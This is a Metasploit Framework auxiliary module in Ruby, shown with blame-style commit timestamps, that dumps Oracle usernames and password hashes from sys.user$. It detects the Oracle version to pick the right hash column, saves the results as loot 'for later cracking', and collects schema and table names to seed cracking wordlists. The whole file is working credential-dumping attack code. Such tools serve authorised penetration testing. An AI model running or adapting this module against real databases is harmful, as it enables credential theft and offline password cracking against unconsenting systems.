2011-10-10 17:05:01 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/framework/
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
|
|
|
include Msf::Exploit::ORACLE
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
|
|
|
|
|
|
|
|
def initialize
|
|
|
|
super(
|
|
|
|
'Name' => 'Oracle Password Hashdump',
|
2011-10-17 01:27:28 +00:00
|
|
|
'Version' => '$Revision$',
|
2011-10-10 17:05:01 +00:00
|
|
|
'Description' => %Q{
|
|
|
|
This module dumps the usernames and password hashes
|
2011-10-18 00:54:05 +00:00
|
|
|
from Oracle given the proper Credentials and SID.
|
2011-10-10 17:05:01 +00:00
|
|
|
These are then stored as loot for later cracking.
|
|
|
|
},
|
|
|
|
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
|
|
|
|
'License' => MSF_LICENSE
|
|
|
|
)
|
|
|
|
end
|
|
|
|
|
|
|
|
def run_host(ip)
|
|
|
|
return if not check_dependencies
|
|
|
|
|
|
|
|
#Checks for Version of Oracle, 8g-10g all behave one way, while 11g behaves differently
|
|
|
|
#Also, 11g uses SHA-1 while 8g-10g use DES
|
|
|
|
is_11g=false
|
|
|
|
query = 'select * from v$version'
|
|
|
|
ver = prepare_exec(query)
|
|
|
|
|
|
|
|
if ver.nil?
|
|
|
|
print_error("An Error has occured, check your OPTIONS")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
unless ver.empty?
|
|
|
|
if ver[0].include?('11g')
|
|
|
|
is_11g=true
|
|
|
|
print_status("Server is running 11g, using newer methods...")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
this_service = report_service(
|
|
|
|
:host => datastore['RHOST'],
|
|
|
|
:port => datastore['RPORT'],
|
|
|
|
:name => 'oracle',
|
|
|
|
:proto => 'tcp'
|
|
|
|
)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
tbl = Rex::Ui::Text::Table.new(
|
|
|
|
'Header' => 'Oracle Server Hashes',
|
|
|
|
'Ident' => 1,
|
|
|
|
'Columns' => ['Username', 'Hash']
|
|
|
|
)
|
|
|
|
|
|
|
|
#Get the usernames and hashes for 8g-10g
|
|
|
|
begin
|
|
|
|
if is_11g==false
|
|
|
|
query='SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
|
|
|
|
results= prepare_exec(query)
|
|
|
|
unless results.empty?
|
|
|
|
results.each do |result|
|
|
|
|
row= result.split(/,/)
|
|
|
|
tbl << row
|
|
|
|
end
|
|
|
|
end
|
|
|
|
#Get the usernames and hashes for 11g
|
|
|
|
else
|
|
|
|
query='SELECT name, spare4 FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
|
|
|
|
results= prepare_exec(query)
|
|
|
|
#print_status("Results: #{results.inspect}")
|
|
|
|
unless results.empty?
|
|
|
|
results.each do |result|
|
|
|
|
row= result.split(/,/)
|
|
|
|
row[2] = 'No'
|
|
|
|
tbl << row
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
rescue => e
|
2011-10-18 00:54:05 +00:00
|
|
|
print_error("An error occured. The supplied credentials may not have proper privs")
|
2011-10-10 17:05:01 +00:00
|
|
|
return
|
|
|
|
end
|
|
|
|
print_status("Hash table :\n #{tbl}")
|
|
|
|
report_hashes(tbl.to_csv, is_11g, ip, this_service)
|
|
|
|
|
|
|
|
schema= get_schema()
|
|
|
|
unless schema.nil? or schema.empty?
|
|
|
|
report_other_data(schema,ip)
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_schema
|
|
|
|
#Grabs the Database and table names for storage
|
|
|
|
#These names will be sued later to seed wordlists for cracking
|
|
|
|
query= 'SELECT DISTINCT owner FROM all_tables'
|
|
|
|
databases= prepare_exec(query)
|
|
|
|
schema={}
|
|
|
|
unless databases.empty?
|
|
|
|
databases.each do |db|
|
|
|
|
query= "SELECT table_name FROM all_tables where owner=\'#{db}\'"
|
|
|
|
tables = prepare_exec(query)
|
|
|
|
unless tables.empty?
|
|
|
|
schema[db]= tables
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
return schema
|
|
|
|
end
|
2011-10-17 02:42:01 +00:00
|
|
|
|
2011-10-10 17:05:01 +00:00
|
|
|
def report_hashes(hash_loot, is_11g, ip, service)
|
2011-10-17 02:42:01 +00:00
|
|
|
#reports the hashes slightly differently depending on the version
|
|
|
|
#This is so that we know which are which when we go to crack them
|
2011-10-10 17:05:01 +00:00
|
|
|
if is_11g==false
|
|
|
|
filename= "#{ip}-#{datastore['RPORT']}_oraclehashes.txt"
|
|
|
|
store_loot("oracle.hashes", "text/plain", ip, hash_loot, filename, "Oracle Hashes", service)
|
|
|
|
print_status("Hash Table has been saved")
|
|
|
|
else
|
|
|
|
filename= "#{ip}-#{datastore['RPORT']}_oracle11ghashes.txt"
|
|
|
|
store_loot("oracle11g.hashes", "text/plain", ip, hash_loot, filename, "Oracle 11g Hashes", service)
|
|
|
|
print_status("Hash Table has been saved")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def report_other_data(oracle_schema,ip)
|
|
|
|
|
|
|
|
unless oracle_schema.nil?
|
|
|
|
report_note(
|
|
|
|
:host => ip,
|
|
|
|
:type => "oracle.schema",
|
|
|
|
:data => oracle_schema,
|
|
|
|
:port => datastore['RPORT'],
|
|
|
|
:proto => 'tcp',
|
|
|
|
:update => :unique_data
|
|
|
|
)
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
end
|